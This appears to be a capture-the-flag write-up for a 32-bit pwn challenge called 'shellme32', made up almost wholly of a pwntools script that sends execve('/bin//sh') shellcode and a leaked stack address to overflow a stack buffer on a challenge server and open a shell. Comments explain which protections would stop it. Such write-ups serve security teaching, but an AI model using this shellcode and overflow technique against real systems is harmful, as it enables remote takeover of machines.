shellme32 [pwn]

shellme32

One small step for hackers, one giant leap for pwning kind.

Exploit

from pwn import *
import sys

# Flow of this script: read a value that the service prints before its "> "
# prompt, then reply with 40 bytes of payload followed by that value packed as
# a little-endian 32-bit integer.
#
# NOTE(review): the target binary is not shown on this page. The layout
# suggests an unchecked read into a stack buffer that sits 40 bytes below a
# saved return address, and that the printed value is that buffer's address.
# Confirm against the binary.
#
# Defender's view: if that reading is right, the technique depends on three
# things holding at once: an unbounded copy into a stack buffer, an executable
# stack, and the process disclosing its own stack address (which makes ASLR
# irrelevant). A bounded read, a non-executable stack (NX), or a stack
# protector canary would each break this script as written.

# 28 bytes of 32-bit Linux x86 code: execve("/bin//sh", NULL, NULL) through
# int 0x80, followed by the exit syscall. The pushed "/bin" and "//sh"
# constants and the 0x90 padding below are the kind of byte patterns network
# signatures commonly match on.
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

# Number of bytes sent before the packed address.
PAD_TO = 40

conn = remote("chal.tuctf.com", 30506)

# Everything up to the prompt; the second line of that banner is parsed as the
# leaked value. Base 0 lets int() honour a "0x" prefix if one is present.
banner = conn.readuntil("> ")
leak_line = banner.split("\n")[1]
leak = int(leak_line, 0)
print("LEAK = %08x" % leak)

# Pad the payload with 0x90 (x86 NOP) up to PAD_TO bytes, then append the
# leaked value. `struct` is not imported by name in this file; it is expected
# to come in through the pwntools star import.
padded = shellcode.ljust(PAD_TO, "\x90")
payload = padded + struct.pack("<L", leak)

conn.send(payload)
conn.interactive()